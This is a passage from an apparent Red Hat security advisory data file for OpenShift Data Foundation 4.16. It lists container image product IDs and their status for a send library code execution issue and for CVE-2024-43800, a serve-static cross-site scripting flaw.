"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], known_not_affected: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", 